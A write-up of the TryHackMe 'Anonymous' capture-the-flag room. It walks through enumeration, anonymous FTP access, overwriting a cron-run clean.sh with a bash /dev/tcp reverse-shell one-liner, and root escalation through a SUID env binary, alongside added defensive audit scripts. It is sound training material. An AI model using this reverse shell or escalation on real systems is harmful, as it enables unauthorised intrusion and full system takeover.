Introduction
Let's try the Anonymous room on TryHackMe!
Task 1
Enumerate the machine. How many ports are open?
The following four ports were open!
- 21
- 22
- 139
- 445
Details are in the nmap results in the notes below!
What service is running on port 21?
It is listed in the SERVICE column of the nmap output.
What service is running on ports 139 and 445?
It is not stated in the SERVICE column, but I think a web search will turn it up.
There's a share on the user's computer. What's it called?
Since SMB was available, I ran smbclient, which reveals pics, a share that is not one of the commonly used ones.
user.txt
Accessing pics right away, I was able to log in without a password, so I downloaded the two images stored there!
Checking the metadata with exiftool, I found Creator information in puppos.jpeg:
Creator : Photographer: Tatyana Panova
Description : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
Rights : Tatyana Panova.www.tpanova.ru
Subject : animal, dog, pembroke, corgi, welsh, cute, canine, happy, breed, portrait, pedigree, grass, posing, outdoor, happiness, nature, friend, green, funny, summer, beautiful, looking, color, purebred, adorable, playing, brown, smile, smiling, fun, standing, small, friendly, cheerful, young, view, background, park, life, little, walk, tongue, enjoy, pet, ears, pretty, domestic, lovely, horizontal, sun, grass, park, portrait
Title : Three dogs of welsh corgi pembroke breed with white and red coat with tongue, sitting outdoors on green grass on summer sunny day
Tatyana Panova... seems like quite an impressive person...
https://op.europa.eu/en/web/who-is-who/person/-/person/COM_0000CA073A7C
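The full output is in the exiftool(corgo2) and exiftool(puppos) notes below.
Next I checked with Steghide whether any files were hidden in the images, but found nothing.
I also checked with binwalk whether anything was embedded at the binary level, but there was nothing in particular.
There seems to be nothing more in the images obtained over SMB, so I'll try accessing FTP as anonymous.
There was a scripts directory containing several files, so I downloaded them all.
Below are the contents of clean.sh, which deletes files and writes a log; there are some mistakes in it.
tmp_files appears to be the deletion target, but it is currently 0, so nothing gets deleted...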
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
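What goes wrong on the `if` line, as an added example that is not part of the original write-up or of the target's script: `[ $tmp_files=0 ]` has no spaces around `=`, so the shell tests one non-empty word and the "nothing to delete" branch runs whatever the variable holds. The function names and the hardened `cleanup` variant are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: why clean.sh always logs "nothing to delete".

# Same test as clean.sh: "$tmp_files=0" expands to ONE word such as "5=0".
# With a single argument, [ ] only checks that the string is non-empty.
buggy_branch() {
    local tmp_files="$1"
    if [ $tmp_files=0 ]; then echo "nothing"; else echo "delete"; fi
}

# Corrected test: three separate words and a quoted operand.
fixed_branch() {
    local tmp_files="$1"
    if [ "$tmp_files" = 0 ]; then echo "nothing"; else echo "delete"; fi
}

# Hardened cleanup (hypothetical): cleanup DIR LOG NAME...
# Names are validated so an entry cannot escape DIR, and every expansion
# is quoted. Prints the number of entries removed.
cleanup() {
    local dir="$1" log="$2" name removed=0
    shift 2
    if [ "$#" -eq 0 ]; then
        echo "Running cleanup script: nothing to delete" >> "$log"
        echo 0
        return 0
    fi
    for name in "$@"; do
        case $name in
            ''|.|..|*/*)
                echo "$(date) | Skipped unsafe name: $name" >> "$log"
                continue ;;
        esac
        if rm -rf -- "$dir/$name"; then
            removed=$((removed + 1))
            echo "$(date) | Removed file $dir/$name" >> "$log"
        fi
    done
    echo "$removed"
}

# Constructed inputs: the original test gives the same answer for both.
for v in 0 5; do
    echo "tmp_files=$v buggy=$(buggy_branch "$v") fixed=$(fixed_branch "$v")"
done
```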
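The contents of removed_files.log grow little by little, so clean.sh appears to be run periodically.
(The _1 copy is the one I downloaded first.)
Locally, I created a clean.sh containing the following code, which connects back with a reverse shell, and replaced the file on the FTP side with it: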
#!/bin/bash
bash -i >& /dev/tcp/10.8.1.106/8910 0>&1
user.txt is under the directory I landed in!
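A defender-side check for the weakness used in this section, as an added example that is not part of the original write-up: a script that runs on a schedule must not be replaceable by any account other than the one trusted to maintain it. The function names and the trusted-UID parameter are assumptions, and the code relies on GNU stat (Linux).

```shell
#!/bin/sh
# Added example: can anyone other than the trusted account change a
# scheduled script, either by editing it or by replacing it in its directory?

# writable_by_others PATH -> succeeds if group or other write bits are set.
writable_by_others() {
    local mode
    mode=$(stat -c '%a' -- "$1") || return 2
    [ $(( 0$mode & 022 )) -ne 0 ]
}

# audit_script PATH [TRUSTED_UID]
# Prints one finding per line; returns 0 when clean, 1 when findings exist.
# The parent directory is checked too, because write access to it is enough
# to swap the file, which is what an upload-enabled FTP directory allows.
audit_script() {
    local script="$1" trusted="${2:-0}" findings=0 dir target owner
    if [ ! -f "$script" ]; then
        echo "missing: $script"
        return 2
    fi
    dir=$(dirname -- "$script")
    for target in "$script" "$dir"; do
        owner=$(stat -c '%u' -- "$target")
        if [ "$owner" != "$trusted" ]; then
            echo "owner: $target is owned by uid $owner, expected $trusted"
            findings=$((findings + 1))
        fi
        if writable_by_others "$target"; then
            echo "writable: $target is group- or world-writable"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Usage: pass the scripts referenced by cron jobs or timers as arguments.
for s in "$@"; do
    audit_script "$s" || true
done
```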
root.txt
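Now I look for a foothold toward root privileges.
First I tried sudo -l to look for anything that could be run with root privileges, but found nothing...
Next, I look for executables that are owned by root and have the SUID bit set.
The full output is in the notes below, in the list of root-owned executables with the SUID bit set.
Many of them are executables belonging to the snap package management system, but among the rest I look for ones listed under SUID on GTFOBins.
Doing so, env turned up!
Using that as a reference, I was able to start a shell as root!
After that, opening root.txt under /root gives the flag!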
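The same triage run as an audit, as an added example that is not part of the original write-up: it filters a SUID listing for programs that launch other programs or interpret code, which should never carry the SUID bit. The `RISKY_SUID` list is a hand-picked illustrative subset (an assumption, not a complete list), the function names are hypothetical, and the sample input is an excerpt of the find output in the notes on this page.

```shell
#!/bin/sh
# Added example: flag SUID-root binaries that can run arbitrary commands.

# Illustrative subset (assumption): command launchers and interpreters.
# In practice, compare against a known-good baseline for the distribution.
RISKY_SUID="bash dash sh env find vim python python3 perl awk less more nmap"

# flag_suid: reads one path per line on stdin, prints the risky ones.
flag_suid() {
    local path base name
    while IFS= read -r path; do
        # Snap images are skipped here, mirroring the triage in the write-up;
        # review them separately rather than ignoring them.
        case $path in /snap/*) continue ;; esac
        base=${path##*/}
        for name in $RISKY_SUID; do
            if [ "$base" = "$name" ]; then
                echo "$path"
            fi
        done
    done
    return 0
}

# scan_suid: the find command from this page, piped through the filter.
scan_suid() {
    find / -user root -perm -u=s 2>/dev/null | flag_suid
}

# Excerpt of the listing from the notes on this page.
SAMPLE='/snap/core/8268/bin/su
/snap/core/9066/usr/bin/sudo
/bin/su
/usr/bin/passwd
/usr/bin/env
/usr/bin/sudo
/usr/bin/pkexec'

printf '%s\n' "$SAMPLE" | flag_suid
```

On a hit, removing the bit with chmod u-s on the flagged binary closes the path; env has no need to run with its owner's privileges.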
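Conclusion
I learned the following two things this time:
- FTP may be accessible even without an ID and password
- When investigating executables with the SUID bit set, GTFOBins is unbeatable
Notes
nmap results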
┌──(root㉿kali)-[~]
└─# nmap -sV -script vuln -O -p 1-65535 10.10.220.213
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 20:08 JST
Nmap scan report for 10.10.220.213
Host is up (0.27s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1708.99 seconds
Images
exiftool(corgo2)
ExifTool Version Number : 12.76
File Name : corgo2.jpg
Directory : .
File Size : 43 kB
File Modification Date/Time : 2024:10:13 20:50:03+09:00
File Access Date/Time : 2024:10:13 20:52:16+09:00
File Inode Change Date/Time : 2024:10:13 20:52:16+09:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Profile CMM Type : Little CMS
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2012:01:25 03:41:57
Profile File Signature : acsp
Primary Platform : Apple Computer Inc.
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 0
Profile Description : c2
Profile Copyright : FB
Media White Point : 0.9642 1 0.82491
Media Black Point : 0.01205 0.0125 0.01031
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Red Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Image Width : 800
Image Height : 533
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 800x533
Megapixels : 0.426
exiftool(puppos)
ExifTool Version Number : 12.76
File Name : puppos.jpeg
Directory : .
File Size : 265 kB
File Modification Date/Time : 2024:10:13 20:50:21+09:00
File Access Date/Time : 2024:10:13 20:52:26+09:00
File Inode Change Date/Time : 2024:10:13 20:52:26+09:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Photometric Interpretation : RGB
Image Description : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
Make : Canon
Camera Model Name : Canon EOS 5D Mark II
Orientation : Horizontal (normal)
Samples Per Pixel : 3
X Resolution : 300
Y Resolution : 300
Resolution Unit : inches
Software : Adobe Photoshop CC 2018 (Macintosh)
Modify Date : 2019:02:18 12:24:51
Artist : Photographer: Tatyana Panova
Y Cb Cr Positioning : Centered
Copyright : Tatyana Panova.www.tpanova.ru
Exposure Time : 1/250
F Number : 2.8
Exposure Program : Manual
ISO : 125
Exif Version : 0221
Date/Time Original : 2016:07:23 08:59:38
Create Date : 2016:07:23 08:59:38
Components Configuration : Y, Cb, Cr, -
Shutter Speed Value : 1/250
Aperture Value : 2.8
Exposure Compensation : 0
Max Aperture Value : 2.0
Metering Mode : Multi-segment
Flash : Off, Did not fire
Focal Length : 135.0 mm
Sub Sec Time Original : 82
Flashpix Version : 0100
Color Space : sRGB
Exif Image Width : 600
Exif Image Height : 400
Focal Plane X Resolution : 3849.211765
Focal Plane Y Resolution : 3908.141975
Focal Plane Resolution Unit : inches
Custom Rendered : Normal
Exposure Mode : Manual
White Balance : Manual
Scene Capture Type : Standard
Contrast : High
Saturation : Normal
Sharpness : Hard
Serial Number : 3431608384
Lens Info : 135mm f/?
Lens Model : EF135mm f/2L USM
Compression : JPEG (old-style)
Thumbnail Offset : 1234
Thumbnail Length : 5751
Current IPTC Digest : 1046626f1c229c56fb34d23bbdda2756
Coded Character Set : UTF8
Envelope Record Version : 4
Application Record Version : 4
Caption-Abstract : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
By-line : Photographer: Tatyana Panova
Object Name : Three dogs of welsh corgi pembroke breed with white and red coat
Time Created : 08:59:38+00:00
Country-Primary Location Name : Russian Federation
Keywords : animal, dog, pembroke, corgi, welsh, cute, canine, happy, breed, portrait, pedigree, grass, posing, outdoor, happiness, nature, friend, green, funny, summer, beautiful, looking, color, purebred, adorable, playing, brown, smile, smiling, fun, standing, small, friendly, cheerful, young, view, background, park, life, little, walk, tongue, enjoy, pet, ears, pretty, domestic, lovely, horizontal, sun, grass, park, portrait
Copyright Notice : Tatyana Panova.www.tpanova.ru
Local Caption : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
IPTC Digest : 1046626f1c229c56fb34d23bbdda2756
Displayed Units X : inches
Displayed Units Y : inches
Print Style : Centered
Print Position : 0 0
Print Scale : 1
Global Angle : 30
Global Altitude : 30
URL List :
Slices Group Name : Pembroke Welsh Corgis 118102236
Num Slices : 1
Pixel Aspect Ratio : 1
Photoshop Thumbnail : (Binary data 5751 bytes, use -b option to extract)
Has Real Merged Data : Yes
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CC 2018
Photoshop Quality : 12
Photoshop Format : Progressive
Progressive Scans : 3 Scans
XMP Toolkit : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Approximate Focus Distance : 5.8
Firmware : 2.0.9
Flash Compensation : 0
Lens : EF135mm f/2L USM
Image Number : 0
Format : image/jpeg
Legacy IPTC Digest : 5DE4234A473A3566843FD0F2FF84254E
Date Created : 2016:07:23 08:59:38
Country : Russian Federation
Credit : tanipanova - stock.adobe.com
Source : 118102236
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
Creator Tool : Adobe Photoshop CS6 (Windows)
Label : Выбрать
Metadata Date : 2019:02:18 12:24:51-05:00
Rating : 0
Document ID : xmp.did:BEE10DB23B52E61189C3B77A23A9257A
Instance ID : xmp.iid:75877983-44d5-4a42-b09a-81ff79d9f47f
Original Document ID : 333F4C47AEEA6DE803497C434CD9E134
Already Applied : True
Auto Lateral CA : 0
Blacks 2012 : 0
Blue Hue : 0
Blue Saturation : 0
Brightness : +50
Camera Profile : Adobe Standard
Camera Profile Digest : 3DA8CE4A626CE36A1D0C55BF157793C9
Clarity : 0
Clarity 2012 : 0
Color Noise Reduction : 25
Color Noise Reduction Detail : 50
Contrast 2012 : +16
Convert To Grayscale : False
Defringe : 0
Exposure : 0.00
Exposure 2012 : +0.25
Fill Light : 0
Grain Amount : 0
Green Hue : 0
Green Saturation : 0
Has Crop : False
Has Settings : True
Highlight Recovery : 0
Highlights 2012 : -39
Hue Adjustment Aqua : 0
Hue Adjustment Blue : 0
Hue Adjustment Green : +22
Hue Adjustment Magenta : 0
Hue Adjustment Orange : 0
Hue Adjustment Purple : 0
Hue Adjustment Red : 0
Hue Adjustment Yellow : 0
Lens Manual Distortion Amount : 0
Lens Profile Enable : 0
Lens Profile Setup : LensDefaults
Luminance Adjustment Aqua : 0
Luminance Adjustment Blue : 0
Luminance Adjustment Green : 0
Luminance Adjustment Magenta : 0
Luminance Adjustment Orange : 0
Luminance Adjustment Purple : 0
Luminance Adjustment Red : 0
Luminance Adjustment Yellow : 0
Luminance Smoothing : 0
Parametric Darks : 0
Parametric Highlight Split : 75
Parametric Highlights : 0
Parametric Lights : 0
Parametric Midtone Split : 50
Parametric Shadow Split : 25
Parametric Shadows : 0
Perspective Horizontal : 0
Perspective Rotate : 0.0
Perspective Scale : 100
Perspective Vertical : 0
Post Crop Vignette Amount : 0
Process Version : 6.7
Raw File Name : IMG_6219.CR2
Red Hue : 0
Red Saturation : 0
Saturation Adjustment Aqua : 0
Saturation Adjustment Blue : 0
Saturation Adjustment Green : 0
Saturation Adjustment Magenta : 0
Saturation Adjustment Orange : 0
Saturation Adjustment Purple : 0
Saturation Adjustment Red : 0
Saturation Adjustment Yellow : 0
Shadow Tint : 0
Shadows : 5
Shadows 2012 : +41
Sharpen Detail : 25
Sharpen Edge Masking : 0
Sharpen Radius : +1.0
Split Toning Balance : 0
Split Toning Highlight Hue : 0
Split Toning Highlight Saturation: 0
Split Toning Shadow Hue : 0
Split Toning Shadow Saturation : 0
Tint : +1
Tone Curve Name : Medium Contrast
Tone Curve Name 2012 : Linear
Version : 7.0
Vibrance : +11
Vignette Amount : 0
Whites 2012 : -40
Creator : Photographer: Tatyana Panova
Description : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
Rights : Tatyana Panova.www.tpanova.ru
Subject : animal, dog, pembroke, corgi, welsh, cute, canine, happy, breed, portrait, pedigree, grass, posing, outdoor, happiness, nature, friend, green, funny, summer, beautiful, looking, color, purebred, adorable, playing, brown, smile, smiling, fun, standing, small, friendly, cheerful, young, view, background, park, life, little, walk, tongue, enjoy, pet, ears, pretty, domestic, lovely, horizontal, sun, grass, park, portrait
Title : Three dogs of welsh corgi pembroke breed with white and red coat with tongue, sitting outdoors on green grass on summer sunny day
Document Ancestors : xmp.did:BEE10DB23B52E61189C3B77A23A9257A
Credit Line : tanipanova - stock.adobe.com
Derived From Document ID : xmp.did:BEE10DB23B52E61189C3B77A23A9257A
Derived From Instance ID : xmp.iid:7FB65C5E4352E61190E1C89788FB283A
Derived From Original Document ID: 333F4C47AEEA6DE803497C434CD9E134
History Action : saved, saved, derived, saved, saved, converted, derived, saved, saved, saved, saved
History Changed : /metadata, /metadata, /, /, /, /metadata, /metadata, /
History Instance ID : xmp.iid:D8A179599B50E61194A0D5FD6D066061, xmp.iid:0000FF4A3B52E61189C3B77A23A9257A, xmp.iid:BEE10DB23B52E61189C3B77A23A9257A, xmp.iid:7FB65C5E4352E61190E1C89788FB283A, xmp.iid:80B65C5E4352E61190E1C89788FB283A, xmp.iid:138DB7A58152E611A43CC45C0ECCF258, xmp.iid:F71FE5628452E611B989BDA57765146E, xmp.iid:75877983-44d5-4a42-b09a-81ff79d9f47f
History Software Agent : Adobe Photoshop Camera Raw 7.0, Adobe Photoshop Camera Raw 7.0 (Windows), Adobe Photoshop Camera Raw 7.0 (Windows), Adobe Photoshop CS6 (Windows), Adobe Photoshop CS6 (Windows), Adobe Photoshop Camera Raw 7.0, Adobe Photoshop Camera Raw 7.0 (Windows), Adobe Photoshop CC 2018 (Macintosh)
History When : 2016:07:23 09:04:44+03:00, 2016:07:25 10:42:10+03:00, 2016:07:25 10:45:02+03:00, 2016:07:25 11:52:53+03:00, 2016:07:25 11:52:53+03:00, 2016:07:25 19:05:46+03:00, 2016:07:25 19:29:49+03:00, 2019:02:18 12:24:51-05:00
History Parameters : converted from image/x-canon-cr2 to image/tiff, from image/tiff to image/jpeg, converted from image/tiff to image/jpeg
Tone Curve : 0, 0, 32, 22, 64, 56, 128, 128, 192, 196, 255, 255
Tone Curve Blue : 0, 0, 255, 255
Tone Curve Green : 0, 0, 255, 255
Tone Curve PV2012 : 0, 0, 255, 255
Tone Curve PV2012 Blue : 0, 0, 255, 255
Tone Curve PV2012 Green : 0, 0, 255, 255
Tone Curve PV2012 Red : 0, 0, 255, 255
Tone Curve Red : 0, 0, 255, 255
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 600
Image Height : 400
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Aperture : 2.8
Image Size : 600x400
Megapixels : 0.240
Scale Factor To 35 mm Equivalent: 9.1
Shutter Speed : 1/250
Date/Time Original : 2016:07:23 08:59:38.82
Thumbnail Image : (Binary data 5751 bytes, use -b option to extract)
Date/Time Created : 2016:07:23 08:59:38+00:00
Circle Of Confusion : 0.003 mm
Depth Of Field : 0.03 m (5.78 - 5.82 m)
Field Of View : 1.7 deg
Focal Length : 135.0 mm (35 mm equivalent: 1233.2 mm)
Hyperfocal Distance : 1978.87 m
Light Value : 10.6
Lens ID : Canon EF 135mm f/2L USM
Executables owned by root with the SUID bit set
find / -user root -perm -u=s 2>/dev/null
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9066/bin/mount
/snap/core/9066/bin/ping
/snap/core/9066/bin/ping6
/snap/core/9066/bin/su
/snap/core/9066/bin/umount
/snap/core/9066/usr/bin/chfn
/snap/core/9066/usr/bin/chsh
/snap/core/9066/usr/bin/gpasswd
/snap/core/9066/usr/bin/newgrp
/snap/core/9066/usr/bin/passwd
/snap/core/9066/usr/bin/sudo
/snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9066/usr/lib/openssh/ssh-keysign
/snap/core/9066/usr/lib/snapd/snap-confine
/snap/core/9066/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/env
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec